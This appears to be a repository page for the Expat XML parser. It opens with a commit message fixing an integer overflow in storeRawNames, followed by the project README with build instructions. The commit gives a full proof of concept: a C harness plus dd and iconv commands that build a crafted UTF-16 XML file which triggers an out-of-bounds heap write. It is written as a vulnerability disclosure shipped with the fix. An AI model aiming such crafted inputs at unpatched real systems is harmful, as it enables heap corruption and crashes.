Go to file
Samanta Navarro eb0362808b Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.

Unfortunately (from an attacker point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counter-parts.

The proof of concept works by taking these three considerations into
account:

1. Move the m_buffer size slightly below a power of two by having a
   short root node <a>. This allows the m_buffer to grow very close
   to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
   INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
   limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
   which only contains ASCII characters. UTF-16 always stores two
   bytes per character while the tag name is converted to using only
   one. Our attack node byte count must be a bit higher than
   2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
   in sum can overflow INT_MAX.

Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create Proof of Concept binary which iterates through input
   file 16 MB at once for better performance and easier integer
   calculations:

```
cat > poc.c << EOF
 #include <err.h>
 #include <expat.h>
 #include <stdlib.h>
 #include <stdio.h>

 #define CHUNK (16 * 1024 * 1024)
 int main(int argc, char *argv[]) {
   XML_Parser parser;
   FILE *fp;
   char *buf;
   int i;

   if (argc != 2)
     errx(1, "usage: poc file.xml");
   if ((parser = XML_ParserCreate(NULL)) == NULL)
     errx(1, "failed to create expat parser");
   if ((fp = fopen(argv[1], "r")) == NULL) {
     XML_ParserFree(parser);
     err(1, "failed to open file");
   }
   if ((buf = malloc(CHUNK)) == NULL) {
     fclose(fp);
     XML_ParserFree(parser);
     err(1, "failed to allocate buffer");
   }
   i = 0;
   while (fread(buf, CHUNK, 1, fp) == 1) {
     printf("iteration %d: XML_Parse returns %d\n", ++i,
       XML_Parse(parser, buf, CHUNK, XML_FALSE));
   }
   free(buf);
   fclose(fp);
   XML_ParserFree(parser);
   return 0;
 }
EOF
gcc -fsanitize=address -lexpat -o poc poc.c
```

3. Construct specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run proof of concept:

```
./poc poc-utf16.xml
```
2022-02-15 12:17:18 +00:00
.github Sync years in file headers 2022-01-13 23:45:22 +01:00
expat Prevent integer overflow in storeRawNames 2022-02-15 12:17:18 +00:00
testdata Fix typos and add ICPSR full name 2017-10-02 21:54:52 +02:00
.gitignore .gitignore: Add missing 2022-01-29 23:28:05 +01:00
.mailmap .mailmap: Initialize Git mailmap 2021-05-02 19:53:29 +02:00
.travis.sh Actions: Upgrade Clang from 11 to 13 2021-12-26 19:51:44 +01:00
appveyor.yml Increase precision in existing MIT headers based on Git history 2021-05-02 19:53:29 +02:00
Brewfile Actions: Split off Cppcheck to stop installing 13 unrelated Homebrew formulas 2021-04-06 23:52:35 +02:00
README.md Migrate README to Markdown 2017-07-29 16:21:39 +02:00

Run Linux Travis CI tasks AppVeyor Build Status Packaging status Downloads SourceForge Downloads GitHub

Expat, Release 2.4.4

This is Expat, a C library for parsing XML, started by James Clark in 1997. Expat is a stream-oriented XML parser. This means that you register handlers with the parser before starting the parse. These handlers are called when the parser discovers the associated structures in the document being parsed. A start tag is an example of the kind of structures for which you may register handlers.

Expat supports the following compilers:

  • GNU GCC >=4.5
  • LLVM Clang >=3.5
  • Microsoft Visual Studio >=15.0/2017 (rolling ${today} minus 5 years)

Windows users can use the expat-win32bin-*.*.*.{exe,zip} download, which includes both pre-compiled libraries and executables, and source code for developers.

Expat is free software. You may copy, distribute, and modify it under the terms of the License contained in the file COPYING distributed with this package. This license is the same as the MIT/X Consortium license.

Using libexpat in your CMake-Based Project

There are two ways of using libexpat with CMake:

a) Module Mode

This approach leverages CMake's own module FindEXPAT.

Notice the uppercase EXPAT in the following example:

cmake_minimum_required(VERSION 3.0)  # or 3.10, see below

project(hello VERSION 1.0.0)

find_package(EXPAT 2.2.8 MODULE REQUIRED)

add_executable(hello
    hello.c
)

# a) for CMake >=3.10 (see CMake's FindEXPAT docs)
target_link_libraries(hello PUBLIC EXPAT::EXPAT)

# b) for CMake >=3.0
target_include_directories(hello PRIVATE ${EXPAT_INCLUDE_DIRS})
target_link_libraries(hello PUBLIC ${EXPAT_LIBRARIES})

b) Config Mode

This approach requires files from…

  • libexpat >=2.2.8 where packaging uses the CMake build system or
  • libexpat >=2.3.0 where packaging uses the GNU Autotools build system on Linux or
  • libexpat >=2.4.0 where packaging uses the GNU Autotools build system on macOS or MinGW.

Notice the lowercase expat in the following example:

cmake_minimum_required(VERSION 3.0)

project(hello VERSION 1.0.0)

find_package(expat 2.2.8 CONFIG REQUIRED char dtd ns)

add_executable(hello
    hello.c
)

target_link_libraries(hello PUBLIC expat::expat)

Building from a Git Clone

If you are building Expat from a check-out from the Git repository, you need to run a script that generates the configure script using the GNU autoconf and libtool tools. To do this, you need to have autoconf 2.58 or newer. Run the script like this:

./buildconf.sh

Once this has been done, follow the same instructions as for building from a source distribution.

Building from a Source Distribution

a) Building with the configure script (i.e. GNU Autotools)

To build Expat from a source distribution, you first run the configuration shell script in the top level distribution directory:

./configure

There are many options which you may provide to configure (which you can discover by running configure with the --help option). But the one of most interest is the one that sets the installation directory. By default, the configure script will set things up to install libexpat into /usr/local/lib, expat.h into /usr/local/include, and xmlwf into /usr/local/bin. If, for example, you'd prefer to install into /home/me/mystuff/lib, /home/me/mystuff/include, and /home/me/mystuff/bin, you can tell configure about that with:

./configure --prefix=/home/me/mystuff

Another interesting option is to enable 64-bit integer support for line and column numbers and the over-all byte index:

./configure CPPFLAGS=-DXML_LARGE_SIZE

However, such a modification would be a breaking change to the ABI and is therefore not recommended for general use — e.g. as part of a Linux distribution — but rather for builds with special requirements.

After running the configure script, the make command will build things and make install will install things into their proper location. Have a look at the Makefile to learn about additional make options. Note that you need to have write permission into the directories into which things will be installed.

If you are interested in building Expat to provide document information in UTF-16 encoding rather than the default UTF-8, follow these instructions (after having run make distclean). Please note that we configure with --without-xmlwf as xmlwf does not support this mode of compilation (yet):

  1. Mass-patch Makefile.am files to use libexpatw.la for a library name:
    find -name Makefile.am -exec sed -e 's,libexpat\.la,libexpatw.la,' -e 's,libexpat_la,libexpatw_la,' -i {} +

  2. Run automake to re-write Makefile.in files:
    automake

  3. For UTF-16 output as unsigned short (and version/error strings as char), run:
    ./configure CPPFLAGS=-DXML_UNICODE --without-xmlwf
    For UTF-16 output as wchar_t (incl. version/error strings), run:
    ./configure CFLAGS="-g -O2 -fshort-wchar" CPPFLAGS=-DXML_UNICODE_WCHAR_T --without-xmlwf
    Note: The latter requires libc compiled with -fshort-wchar, as well.

  4. Run make (which excludes xmlwf).

  5. Run make install (again, excludes xmlwf).

Using DESTDIR is supported. It works as follows:

make install DESTDIR=/path/to/image

overrides the in-makefile set DESTDIR, because variable-setting priority is

  1. commandline
  2. in-makefile
  3. environment

Note: This only applies to the Expat library itself, building UTF-16 versions of xmlwf and the tests is currently not supported.

When using Expat with a project using autoconf for configuration, you can use the probing macro in conftools/expat.m4 to determine how to include Expat. See the comments at the top of that file for more information.

A reference manual is available in the file doc/reference.html in this distribution.

b) Building with CMake

The CMake build system is still experimental and may replace the primary build system based on GNU Autotools at some point when it is ready.

Available Options

For an idea of the available (non-advanced) options for building with CMake:

# rm -f CMakeCache.txt ; cmake -D_EXPAT_HELP=ON -LH . | grep -B1 ':.*=' | sed 's,^--$,,'
// Choose the type of build, options are: None Debug Release RelWithDebInfo MinSizeRel ...
CMAKE_BUILD_TYPE:STRING=

// Install path prefix, prepended onto install directories.
CMAKE_INSTALL_PREFIX:PATH=/usr/local

// Path to a program.
DOCBOOK_TO_MAN:FILEPATH=/usr/bin/docbook2x-man

// build man page for xmlwf
EXPAT_BUILD_DOCS:BOOL=ON

// build the examples for expat library
EXPAT_BUILD_EXAMPLES:BOOL=ON

// build fuzzers for the expat library
EXPAT_BUILD_FUZZERS:BOOL=OFF

// build pkg-config file
EXPAT_BUILD_PKGCONFIG:BOOL=ON

// build the tests for expat library
EXPAT_BUILD_TESTS:BOOL=ON

// build the xmlwf tool for expat library
EXPAT_BUILD_TOOLS:BOOL=ON

// Character type to use (char|ushort|wchar_t) [default=char]
EXPAT_CHAR_TYPE:STRING=char

// install expat files in cmake install target
EXPAT_ENABLE_INSTALL:BOOL=ON

// Use /MT flag (static CRT) when compiling in MSVC
EXPAT_MSVC_STATIC_CRT:BOOL=OFF

// build fuzzers via ossfuzz for the expat library
EXPAT_OSSFUZZ_BUILD:BOOL=OFF

// build a shared expat library
EXPAT_SHARED_LIBS:BOOL=ON

// Treat all compiler warnings as errors
EXPAT_WARNINGS_AS_ERRORS:BOOL=OFF

// Make use of getrandom function (ON|OFF|AUTO) [default=AUTO]
EXPAT_WITH_GETRANDOM:STRING=AUTO

// utilize libbsd (for arc4random_buf)
EXPAT_WITH_LIBBSD:BOOL=OFF

// Make use of syscall SYS_getrandom (ON|OFF|AUTO) [default=AUTO]
EXPAT_WITH_SYS_GETRANDOM:STRING=AUTO